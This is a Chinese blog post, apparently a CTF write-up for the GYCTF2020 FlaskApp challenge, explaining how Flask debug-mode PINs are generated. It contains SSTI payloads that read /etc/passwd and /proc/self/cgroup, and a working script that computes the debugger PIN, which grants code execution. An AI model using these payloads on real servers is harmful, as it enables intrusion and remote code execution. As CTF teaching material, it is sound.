Flask debug 模式 PIN 码获取

最新推荐文章于 2024-03-31 22:31:09 发布
最新推荐文章于 2024-03-31 22:31:09 发布
阅读量2.5k 收藏 4
点赞数 1
CC 4.0 BY-SA版权
分类专栏: python安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43536759/article/details/105194333
本文深入探讨了GYCTF2020比赛中的FlaskApp题目,解析了Flask debug模式下PIN码的生成机制,包括关键值的构成如用户名、modname等,并提供了生成脚本及参考资料。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

本文由一道CTF题讲解。
[GYCTF2020]FlaskApp(BUUCTF有原题)

讲解

PIN 机制在 Flask debug 模式 PIN 码生成机制安全性研究笔记 一文中有详细的研究。

由官方write up总结出,生成PIN的关键值有如下几个

1. 服务器运行flask所登录的用户名。 通过/etc/passwd中可以猜测为flaskweb 或者root ,此处用的flaskweb
{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/etc/passwd').read()}}

在这里插入图片描述

2. modname 一般不变就是flask.app
3. getattr(app, “__name__”, app.__class__.__name__)。python该值一般为Flask 值一般不变
4. flask库下app.py的绝对路径。通过报错信息就会泄露该值。本题的值为在这里插入图片描述
5. 当前网络的mac地址的十进制数。读取**/sys/class/net/eth0/address获取str(uuid.getnode())**,给出的是16进制,转为10进制得到2485377957894:

在这里插入图片描述
在这里插入图片描述

6.最后一个就是机器的id。

对于非docker机每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_i,有的系统没有这两个文件,windows的id获取跟linux也不同。

对于docker机则读取读取/proc/self/cgroup获取get_machine_id()(docker后面那段字符串):

{{{}.__class__.__mro__[-1].__subclasses__()[102].__init__.__globals__['open']('/proc/self/cgroup').read()}}

在这里插入图片描述

脚本

import hashlib
from itertools import chain
probably_public_bits = [
    'flaskweb'# username
    'flask.app',# modname
    'Flask',# getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/usr/local/lib/python3.7/site-packages/flask/app.py' # getattr(mod, '__file__', None),
]

private_bits = [
    '2485377957894',# str(uuid.getnode()),  /sys/class/net/ens33/address
    '3c7c60af8484830ab0b1e9615fada4e74d93a8a111baa4afcd949feeab56c320'# get_machine_id(), /etc/machine-id
]

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookiesalt')

cookie_name = '__wzd' + h.hexdigest()[:20]

num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

rv =None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print(rv)

参考

https://www.cnblogs.com/MisakaYuii-Z/p/12407760.html
http://15h3na0.xyz/2020/02/24/ICQ%20GYCTF2020/#Day3-easy-thinking
Flask的key与pin安全简析

STM32开发 -- W25Q32JV SPI FlASH详解
不积跬步,无以至千里
11-20 9884
flash这部分也是很重的一部分了,尤其是地址选择,OTA升级等操作。 一、 未完待续
stm32 SPI、FLASH
及时总结
01-19 1592
main.c FLASH:掉电后数据不丢失,U 盘、SD 卡、SSD 固态硬盘、STM32 芯片内部用于存储程序的设备,都是 FLASH 类型的存储器。FLASH芯片(W25Q64)是一种使用 SPI 通讯协议的 NOR FLASH 存储器。 STM32 的 NSS 引脚是一个普通的 GPIO,程序中要使用软件控制的方式。 结果: 里面的FlashID是Flash芯片ID,就是W25Q64的厂商号和FLASH型号。通过Flash型号对比来看看W25Q64是否连接正常。 然后擦除FLASH扇区,往FLAS
浅谈Flask Pin
mr_xioabai的博客
08-02 513
每一个机器都会有自已唯一的id,linux的id一般存放在/etc/machine-id或/proc/sys/kernel/random/boot_id,docker靶机则读取/proc/self/cgroup,其中第一行的/docker/字符串后面的内容作为机器的id,在非docker环境下读取后两个,非docker环境三个都需要读取。通过uuid.getnode()读取,通过文件/sys/class/net/eth0/address得到16进制结果,转化为10进制进行计算。将其十六进制转为十进制。
flask计算pin
weixin_63231007的博客
07-13 4559
python flask-pin介绍 & CTF中 flask-pin计算的应用
深入浅出Flask PIN
蚁景网安学院
08-01 686
最近搞SSTI,发现有的开发开了debug,由此想到了PIN,但一直没有对这个点做一个深入剖析,今天就完整的整理Flask Debug PIN生成原理与安全问题。PIN是什么?PIN是 Werkzeug(它是 Flask 的依赖项之一)提供的额外安全措施,以防止在不知道 PIN 的情况下访问调试器。您可以使用浏览器中的调试器引脚来启动交互式调试器。请注意,无论如何,您...
Flask debug模式pin
遇事不决冲冲冲
03-21 5801
## 什么是PIN pin也就是flask在开启debug模式下,进行代调试模式的进入密,需要正确的PIN才能进入调试模式 ## 如何生成 这里就列一个了,前面全是获取值,最后进行加密,版本不同区别也就就是3.6与3.8的MD5加密和sha1加密不同
keil5 :no debug unit device found Flash download failed Target DLL has been cancelled.
最新发布
02-27
同时也要检查Flash编程选项卡内的参数设定是否恰当,特别是擦除模式以及写入速度等方面的选择[^3]。 #### 4. 更新固件/软件包 有时旧版MDK可能不支持某些新型号MCU或者存在兼容性缺陷。建议定期查看官方发布的更新...
Android智能手机锁屏密及破解方法研究.pdf
09-22
但是,如果USB调试模式关闭,则需要使用自定义恢复方法来 flash 手机并获取文件系统的访问权限。 本文还提供了一个实际的案例,使用了三星GT-I9300手机来演示锁屏密的破解方法。该案例使用了ADB命令来获取root...
单片机学习笔记————STM32使用SPI读写串行Flash(二)
DJDN426611的博客
02-16 1344
第一步:STM32与Flash的硬件连接 单片机型号:STM32F103ZET6 Flash型号:W25Q64 第二步:配置相关的宏 /**************************SPI接口定义********************************/ #define FLASH_SPIx SPI1 #define FLASH_SPI_APBxClock_FUN
深入浅出Flask PIN
蚁景网安学院
08-01 958
最近搞SSTI,发现有的开发开了debug,由此想到了PIN,但一直没有对这个点做一个深入剖析,今天就完整的整理Flask Debug PIN生成原理与安全问题。
Flask debug 模式 PIN 生成机制安全性研究笔记
01-01 690
Flask debug 模式 PIN 生成机制安全性研究笔记 0x00 前言 前几天我整理了一个笔记Flask开启debug模式等于给黑客留了后门,就Flask在生产网络中开启debug模式可能产生的安全问题做了一个简要的分析。其中有一个比较严重的安全问题是,可以在交互式Python shell中执行自定义Python代。就这一点来讲,在旧版...
[GYCTF2020]FlaskApp--Flask Debug PIN
Mrs_H的博客
12-01 2371
[GYCTF2020]FlaskApp 一.前言 已经很久没有写文章了,最近快要到期末了,事情一天比一天多,没有时间做靶场的题目了。这篇文章想写很久了,事实上在一周前就已经用PIN的方式做出来了这道题,但是一直没有时间来整理,今天下课来到图书馆翻开自己的截图记录就想着把它写出来算了。 二.正文 首先,打开题目,来看这个页面 ...
关于ctf中flaskpin总结
arcuied
02-20 6566
flask pin的相关问题
flask–通过算pin进入控制台
wikey 的博客
03-31 2101
那么首先尝试能不能读取到环境变量的内容–(/proc/self/environ是Linux下中的一个文件,这个文件里保存了系统的一些变量。flask在开启debug模式下,可以通过输入pin进行代调试模式,也就是console控制台。进入题目首先知道两个信息–框架是flask–首先考虑是不是存在ssti第二个是题目描述中的信息(开启了debug模式)好的我们现在知道第一个有用信息就是,最后的flag位置位于环境变量中。这个其实往往都是默认的,但是还是演示一下。很多都是默认的,重点需要关注三个东西。
PythonServer-Flask-Pin攻击
young9222的博客
04-03 2425
一道有关Flask开启DEBUG结合任意文件读取生成PIN攻击的题目。可惜没有及时截图,现在只剩下文字了,凑合记录一下。 正常注册用户,登陆用户,查看源代发现在打开图片时,图片名由base64编 利用其解析base64的漏洞,进行目录穿越,例如对“…/…/…/…/etc/passwd"进行base64编后查看响应包获得文件内容 由于存在文件读取漏洞,所以可以依次读取: u...
初探flask debug生成pin
m0_62422842的博客
08-22 1695
flask框架pin生成进行初步认识,通过一道ctf题目加深对pin的理解
【Python-flask库开启debug调试导致PIN破解泄露RCE】
giaogiaohuohua的博客
01-25 2434
2、这里又有一个坑点,配置好了python之后呢,既然是破解PIN,肯定是需要安装flask,然后看看对应版本中PIN的算法,这里直接使用pip安装会报错,pip会说版本太低了,要先升级,升级完成之后就会报错如下。注:flask在遇到报错时,如果开启了debug模式,就可以在web上建立一个交互式shell进行python调试,但是需要PINPIN是可以破解的。4、得到全部参数后,运行脚本,将得到的PIN输入到,即可开启debug调试模式。注:不同的python版本,1、python的版本。
2021-02-23
m0_53314778的博客
02-23 477
[GYCTF2020]FlaskApp 知识点 Flask模板注入中debug模式pin获取和利用 Pin (代识别debug模式,为什么assert()在debug模式下才有用? ssti的绕过(拼接字符串,倒序切片,内置对象、函数) WP: 前言:Flask开启debug模式等于给黑客留了后门 参考链接:Flask开启debug模式 Flask在生产环境中开启debug模式是一件非常危险的事,主要有3点原因: 1、会泄露当前报错页面的源,可供审计挖掘其他漏洞 2、会泄露W
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值